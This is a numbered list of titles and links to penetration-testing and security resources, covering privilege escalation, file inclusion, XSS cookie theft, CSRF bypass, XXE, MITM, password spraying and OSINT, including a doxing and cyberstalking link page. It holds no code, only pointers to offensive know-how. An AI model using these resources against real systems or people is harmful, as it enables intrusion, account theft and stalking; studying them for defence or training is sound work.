https://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html
-1554-Windows Post-Exploitation Command List:
http://pentest.tonyng.net/windows-post-exploitation-command-list/
-1555-Windows Post-Exploitation Command List:
http://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html
-1556-Linux Post-Exploitation · OSCP - Useful Resources:
https://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html
-1557-Pentesting Cheatsheet:
https://anhtai.me/pentesting-cheatsheet/
-1558-Pentesting Cheatsheets - Red Teaming Experiments:
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
-1559-OSCP Goldmine:
http://0xc0ffee.io/blog/OSCP-Goldmine
-1560-Linux Post Exploitation Cheat Sheet:
http://red-orbita.com/?p=8455
-1562-OSCP useful resources and tools:
https://acknak.fr/en/articles/oscp-tools/
-1563-Windows Post-Exploitation Command List :
https://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List
-1564-Metasploit Cheat Sheet:
https://pentesttools.net/metasploit-cheat-sheet/
-1565-Windows Privilege Escalation:
https://awansec.com/windows-priv-esc.html
-1566-Linux Unix Bsd Post Exploitation:
https://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation
-1567-Privilege Escalation & Post-Exploitation:
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
-1568-Metasploit Cheat Sheet:
https://vk-intel.org/2016/12/28/metasploit-cheat-sheet/
-1569-Metasploit Cheat Sheet :
https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/
-1570-Privilege escalation: Linux:
https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux
-1571-Cheat Sheets — Amethyst Security:
https://www.ssddcyber.com/cheatsheets
-1572-Responder - CheatSheet:
https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/
-1573-Cheatsheets:
https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt
-1574-Are you ready for OSCP?:
https://www.hacktoday.io/t/are-you-ready-for-oscp/59
-1575-Windows Privilege Escalation:
https://labs.p64cyber.com/windows-privilege-escalation/
-1576-A guide to Linux Privilege Escalation:
https://payatu.com/guide-linux-privilege-escalation/
-1577-Windows Post-Exploitation-Cheat-Sheet:
http://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/
-1578-Windows Privilege Escalation (privesc) Resources:
https://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/
-1579-Dissecting Mobile Malware:
https://slideplayer.com/slide/3434519/
-1580-Android malware analysis with Radare: Dissecting the Triada Trojan:
www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/
-1581-Dissecting Mobile Native Code Packers:
https://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/
-1582-What is Mobile Malware? Defined, Explained, and Explored:
https://www.forcepoint.com/cyber-edu/mobile-malware
-1583-Malware Development — Professionalization of an Ancient Art:
https://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b
-1584-Weaponizing Malware Code Sharing with Cythereal MAGIC:
https://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d
-1585-Web App Pentest Cheat Sheet:
https://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773
-1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued:
https://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf
-1587-How to Run An External Pentest:
https://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a
-1588-Advice for new pentesters:
https://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea
-1589-NodeJS Application Pentest Tips:
https://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e
-1590-How to combine Pentesting with Automation to improve your security:
https://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security
-1591-Day 79: FTP Pentest Guide:
https://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a
-1592-SigintOS: A Wireless Pentest Distro Review:
https://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b
-1593-Conducting an IoT Pentest :
https://medium.com/p/6fa573ac6668?source=user_profile...
-1594-Efficient way to pentest Android Chat Applications:
https://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f
-1595-APT2 - Automated PenTest Toolkit :
https://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href
-1596-Pentest Tools and Distros:
https://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d
-1597-Keeping notes during a pentest/security assessment/code review:
https://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b
-1598-An intro to pentesting an Android phone:
https://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39
-1599-The Penetration Testing Report:
https://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2
-1600-VA vs Pentest:
https://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03
-1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux:
https://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f
-1602-Pentesting Ethereum dApps:
https://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19
-1603-Android pentest lab in a nutshell :
https://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3
-1604-Pentest Magazine: Web Scraping with Python :
https://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3
-1605-Pentesting iOS apps without jailbreak:
https://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e
-1606-OSCP/Pen Testing Resources:
https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45
-1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting):
https://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc
-1608-Local File Inclusion (LFI) — Web Application Penetration Testing:
https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601
-1609-Local File Inclusion (Basic):
https://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3
-1610-PHP File Inclusion Vulnerability:
https://www.immuniweb.com/vulnerability/php-file-inclusion.html
-1611-Local File Inclusion:
https://teambi0s.gitlab.io/bi0s-wiki/web/lfi/
-1612-Web Application Penetration Testing: Local File Inclusion:
https://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/
-1613-From Local File Inclusion to Code Execution :
https://resources.infosecinstitute.com/local-file-inclusion-code-execution/
-1614-RFI / LFI:
https://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/
-1615-From Local File Inclusion to Remote Code Execution - Part 2:
https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2
-1616-Local File Inclusion:
https://xapax.gitbooks.io/security/content/local_file_inclusion.html
-1617-Beginner Guide to File Inclusion Attack (LFI/RFI) :
https://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/
-1618-LFI / RFI:
https://secf00tprint.github.io/blog/payload-tester/lfirfi/en
-1619-LFI and RFI Attacks - All You Need to Know:
https://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/
-1620-Log Poisoning - LFI to RCE :
http://liberty-shell.com/sec/2018/05/19/poisoning/
-1621-LFI:
https://www.slideshare.net/cyber-punk/lfi-63050678
-1622-Hand Guide To Local File Inclusion(LFI):
www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html
-1623-Local File Inclusion (LFI) - Cheat Sheet:
https://ironhackers.es/herramientas/lfi-cheat-sheet/
-1624-Web Application Penetration Testing Local File Inclusion (LFI):
https://www.cnblogs.com/Primzahl/p/6258149.html
-1625-File Inclusion Vulnerability Prevention:
https://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/
-1626-The Most In-depth Hacker's Guide:
https://books.google.com/books?isbn=1329727681
-1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking:
https://books.google.com/books?id=e6CHDwAAQBAJ
-1628-Web App Hacking, Part 11: Local File Inclusion:
https://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI
-1629-Local and remote file inclusion :
https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi
-1630-Upgrade from LFI to RCE via PHP Sessions :
https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
-1631-CVV #1: Local File Inclusion:
https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a
-1632-(PDF) Cross Site Scripting (XSS) in Action:
https://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action
-1633-XSS exploitation part 1:
www.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html
-1634-Weaponizing self-xss:
https://silentbreaksecurity.com/weaponizing-self-xss/
-1635-Cookie Tracking and Stealing using Cross-Site Scripting:
https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/
-1636-Defense against the Black Arts:
https://books.google.com/books?isbn=1439821224
-1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens:
https://www.acunetix.com/websitesecurity/csrf-attacks/
-1638-Bypassing CSRF protection:
https://www.bugbountynotes.com/training/tutorial?id=5
-1639-Stealing CSRF tokens with XSS:
https://digi.ninja/blog/xss_steal_csrf_token.php
-1640-Same Origin Policy and ways to Bypass:
https://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12
-1641-Bypassing Same Origin Policy :
https://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/
-1642-Client-Side Attack - an overview :
https://www.sciencedirect.com/topics/computer-science/client-side-attack
-1643-Client-Side Injection Attacks:
https://blog.alertlogic.com/blog/client-side-injection-attacks/
-1645-The Client-Side Battle Against JavaScript Attacks Is Already Here:
https://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2
-1646-Why Let’s Encrypt is a really, really, really bad idea:
https://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801
-1647-Huge Guide to Client-Side Attacks:
https://www.notion.so/d382649cfebd4c5da202677b6cad1d40
-1648-OSCP Prep – Episode 11: Client Side Attacks:
https://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/
-1649-Client side attack - AV Evasion:
https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack
-1650-Client-Side Attack With Metasploit (Part 4):
https://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/
-1651-Ransomware: Latest Developments and How to Defend Against Them:
https://www.recordedfuture.com/latest-ransomware-attacks/
-1652-Cookie Tracking and Stealing using Cross-Site Scripting:
https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/
-1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords:
https://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833
-1654-How I was able to steal cookies via stored XSS in one of the famous e-commerce site:
https://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d
-1655-Steal victim's cookie using Cross Site Scripting (XSS) :
https://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/
-1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security:
https://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86
-1657-Remote Command Execution:
https://hacksland.net/remote-command-execution/
-1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough:
https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2
-1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit):
https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/
-1660-XXE - ZeroSec - Adventures In Information Security:
https://blog.zsec.uk/out-of-band-xxe-2/
-1661-Exploitation: XML External Entity (XXE) Injection:
https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection
-1662-Hack The Box: DevOops:
https://redteamtutorials.com/2018/11/11/hack-the-box-devoops/
-1663-Web Application Penetration Testing Notes:
https://techvomit.net/web-application-penetration-testing-notes/
-1664-WriteUp – Aragog (HackTheBox) :
https://ironhackers.es/en/writeups/writeup-aragog-hackthebox/
-1665-Linux Privilege Escalation Using PATH Variable:
https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
-1666-Linux Privilege Escalation via Automated Script :
https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/
-1667-Privilege Escalation - Linux :
https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html
-1668-Linux Privilege Escalation:
https://percussiveelbow.github.io/linux-privesc/
-1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit :
https://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/
-1670-Linux Privilege Escalation With Kernel Exploit:
https://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/
-1671-Reach the root! How to gain privileges in Linux:
https://hackmag.com/security/reach-the-root/
-1672-Enumeration for Linux Privilege Escalation:
https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959
-1673-Linux Privilege Escalation Scripts :
https://netsec.ws/?p=309
-1674-Understanding Privilege Escalation:
www.admin-magazine.com/Articles/Understanding-Privilege-Escalation
-1675-Toppo:1 | Vulnhub Walkthrough:
https://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d
-1676-Privilege Escalation resources:
https://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources
-1678-OSCP Notes – Privilege Escalation (Linux):
https://securism.wordpress.com/oscp-notes-privilege-escalation-linux/
-1679-Udev Exploit Allows Local Privilege Escalation :
www.madirish.net/370
-1680-Understanding Linux Privilege Escalation and Defending Against It:
https://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it
-1681-Windows Privilege Escalation Using PowerShell:
https://hacknpentest.com/windows-privilege-escalation-using-powershell/
-1682-Privilege Escalation | Azeria Labs:
https://azeria-labs.com/privilege-escalation/
-1683-Abusing SUDO (Linux Privilege Escalation):
https://touhidshaikh.com/blog/?p=790
-1684-Privilege Escalation - Linux:
https://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html
-1685-0day Linux Escalation Privilege Exploit Collection :
https://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/
-1686-Linux for Pentester: cp Privilege Escalation :
https://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html
-1687-Practical Privilege Escalation Using Meterpreter:
https://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/
-1688-dirty_sock: Linux Privilege Escalation (via snapd):
https://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/
-1689-Linux privilege escalation:
https://jok3rsecurity.com/linux-privilege-escalation/
-1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks:
https://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/
-1691-How to prepare for PWK/OSCP, a noob-friendly guide:
https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob
-1692-Basic Linux privilege escalation by kernel exploits:
https://greysec.net/showthread.php?tid=1355
-1693-Linux mount without root :
epaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root
-1694-Linux Privilege Escalation Oscp:
www.condadorealty.com/2h442/linux-privilege-escalation-oscp.html
-1695-Privilege Escalation Attack Tutorial:
https://alhilalgroup.info/photography/privilege-escalation-attack-tutorial
-1696-Oscp Bethany Privilege Escalation:
https://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation
-1697-Hacking a Website and Gaining Root Access using Dirty COW Exploit:
https://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/
-1698-Privilege Escalation - Linux · Total OSCP Guide:
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
-1699-Linux advanced privilege escalation:
https://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation
-1700-Local Linux privilege escalation overview:
https://myexperiments.io/linux-privilege-escalation.html
-1701-Windows Privilege Escalation Scripts & Techniques :
https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194
-1702-Penetration Testing: Maintaining Access:
https://resources.infosecinstitute.com/penetration-testing-maintaining-access/
-1703-Kali Linux Maintaining Access :
https://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm
-1704-Best Open Source Tools for Maintaining Access & Tunneling:
https://n0where.net/maintaining-access
-1705-Maintaining Access Part 1: Introduction and Metasploit Example:
https://www.hackingloops.com/maintaining-access-metasploit/
-1706-Maintaining Access - Ethical hacking and penetration testing:
https://miloserdov.org/?cat=143
-1707-Maintaining Access with Web Backdoors [Weevely]:
https://www.yeahhub.com/maintaining-access-web-backdoors-weevely/
-1708-Best Open Source MITM Tools: Sniffing & Spoofing:
https://n0where.net/mitm-tools
-1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained:
https://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/
-1710-Man In The Middle Attack (MITM):
https://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987
-1711-Real-World Man-in-the-Middle (MITM) Attack :
https://ieeexplore.ieee.org/document/8500082
-1712-The Ultimate Guide to Man in the Middle Attacks :
https://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/
-1713-How to Conduct ARP Spoofing for MITM Attacks:
https://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/
-1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning:
https://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633
-1715-Ettercap and middle-attacks tutorial :
https://pentestmag.com/ettercap-tutorial-for-windows/
-1716-How To Setup A Man In The Middle Attack Using ARP Poisoning:
https://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/
-1717-Intro to Wireshark and Man in the Middle Attacks:
https://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d
-1718-MiTM Attack with Ettercap:
https://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap
-1719-Man in the Middle Attack with Websploit Framework:
https://www.yeahhub.com/man-middle-attack-websploit-framework/
-1720-SSH MitM Downgrade :
https://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade
-1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files:
https://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/
-1722-Powershell port scanner and banner grabber:
https://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/
-1723-What is banner grabbing attack:
https://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php
-1724-Network penetration testing:
https://guif.re/networkpentest
-1725-NMAP Cheatsheet:
https://redteamtutorials.com/2018/10/14/nmap-cheatsheet/
-1726-How To Scan a Network With Nmap:
https://online-it.nu/how-to-scan-a-network-with-nmap/
-1727-Hacking Metasploitable : Scanning and Banner grabbing:
https://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/
-1728-Penetration Testing of an FTP Server:
https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b
-1729-Nmap Usage & Cheet-Sheet:
https://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/
-1730-Discovering SSH Host Keys with NMAP:
https://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html
-1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation:
https://techincidents.com/banner-grabbing-using-nmap-netcat
-1732-Nmap – (Vulnerability Discovery):
https://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/
-1733-Penetration Testing on MYSQL (Port 3306):
https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/
-1774-Password Spraying - Infosec Resources :
https://resources.infosecinstitute.com/password-spraying/
-1775-Password Spraying- Common mistakes and how to avoid them:
https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b
-1776-Password Spraying Tutorial:
https://attack.stealthbits.com/password-spraying-tutorial-defense
-1777-password spraying Archives:
https://www.blackhillsinfosec.com/tag/password-spraying/
-1778-The 21 Best Email Finding Tools::
https://beamery.com/blog/find-email-addresses
-1779-OSINT Primer: People (Part 2):
https://0xpatrik.com/osint-people/
-1780-Discovering Hidden Email Gateways with OSINT Techniques:
https://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/
-1781-Top 20 Data Reconnaissance and Intel Gathering Tools :
https://securitytrails.com/blog/top-20-intel-tools
-1782-101+ OSINT Resources for Investigators [2019]:
https://i-sight.com/resources/101-osint-resources-for-investigators/
-1783-Digging Through Someones Past Using OSINT:
https://nullsweep.com/digging-through-someones-past-using-osint/
-1784-Gathering Open Source Intelligence:
https://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05
-1785-How to Locate the Person Behind an Email Address:
https://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/
-1786-Find hacked email addresses and check breach mails:
https://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/
-1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password :
https://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/
-1788-Top 10 OSINT Tools/Sources for Security Folks:
www.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html
-1789-Top 5 Open Source OSINT Tools for a Penetration Tester:
https://www.breachlock.com/top-5-open-source-osint-tools/
-1790-Open Source Intelligence tools for social media: my own list:
https://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/
-1791-Red Teaming: I can see you! Insights from an InfoSec expert :
https://www.perspectiverisk.com/i-can-see-you-osint/
-1792-OSINT Playbook for Recruiters:
https://amazinghiring.com/osint-playbook/
-1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking:
https://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking
-1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques):
https://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a
-1795-Online Investigative Tools for Social Media Discovery and Locating People:
https://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html
-1796-Expanding Skype Forensics with OSINT: Email Accounts:
http://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/
-1798-2019 OSINT Guide:
https://www.randhome.io/blog/2019/01/05/2019-osint-guide/
-1799-OSINT - Passive Recon and Discovery of Assets:
https://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715
-1800-OSINT With Datasploit:
https://dzone.com/articles/osint-with-datasploit
-1801-Building an OSINT Reconnaissance Tool from Scratch:
https://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b
-1802-Find Identifying Information from a Phone Number Using OSINT Tools:
https://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/
-1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step):
https://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/
-1804-Investigative tools for finding people online and keeping yourself safe:
https://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe
-1805- Full text of "The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim":
https://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt
-1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account:
https://archive.org/details/texts?and%5B%5D=hacking&sin=
-1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!:
https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326
-1808-How to Pass OSCP Like Boss:
https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d
-1809-Deploy a private Burp Collaborator Server in Azure:
https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70
-1810-Using Shodan Better Way! :):
https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6
-1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty:
https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115
-1812-How we got LFI in apache Drill (Recon like a boss)::
https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d
-1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking:
https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14
-1814-Week in OSINT #2019–19:
https://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4
-1814-Week in OSINT #2019–02:
https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f
-1815-Week in OSINT #2019–24:
https://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f
-1816-Page Admin Disclosure | Facebook Bug Bounty 2019:
https://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb
-1817-XSS in Edmodo within 5 Minute (My First Bug Bounty):
https://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d
-1818-Collection Of Bug Bounty Tip-Will Be updated daily:
https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248
-1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.:
https://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6
-1820-How I found a simple bug in Facebook without any Test:
https://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2
-1821-Facebook BugBounty — Disclosing page members:
https://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520
-1822-Don’t underestimates the Errors They can provide good $$$ Bounty!:
https://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596
-1823-Django and Web Security Headers:
https://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e
-1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads:
https://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800
-1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program:
https://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9
-1826-XSS in Microsoft subdomain:
https://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631
-1827-How Angular Protects Us From XSS Attacks?:
https://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95
-1828-[FUN] Bypass XSS Detection WAF:
https://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e
-1829-Bug Hunting Methodology(Part-2):
https://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150
-1830-Learn Web Application Penetration Testing:
https://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361
-1831-“Exploiting a Single Parameter”:
https://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523
-1832-CORS To CSRF Attack:
https://blog.usejournal.com/cors-to-csrf-attack-c33a595d441
-1833-Account Takeover Using CSRF(json-based):
https://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc
-1834-Bypassing Anti-CSRF with Burp Suite Session Handling:
https://bestestredteam.com/tag/anti-csrf/
-1835-10 Methods to Bypass Cross Site Request Forgery (CSRF):
https://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/
-1836-Exploiting CSRF on JSON endpoints with Flash and redirects:
https://medium.com/p/681d4ad6b31b
-1837-Finding and exploiting Cross-site request forgery (CSRF):
https://securityonline.info/finding-exploiting-cross-site-request-forgery/
-1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration:
https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf
-1839-Synchronizer Token Pattern: No more tricks:
https://medium.com/p/d2af836ccf71
-1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service:
https://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1
-1841-XML External Entity(XXE):
https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b
-1842-XXE Attacks— Part 1: XML Basics:
https://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26
-1843-From XXE to RCE with PHP/expect — The Missing Link:
https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7
-1844-My first XML External Entity (XXE) attack with .gpx file:
https://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98
-1845-Open Redirects & Security Done Right!:
https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496
-1846-XXE on Windows system …then what ??:
https://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745
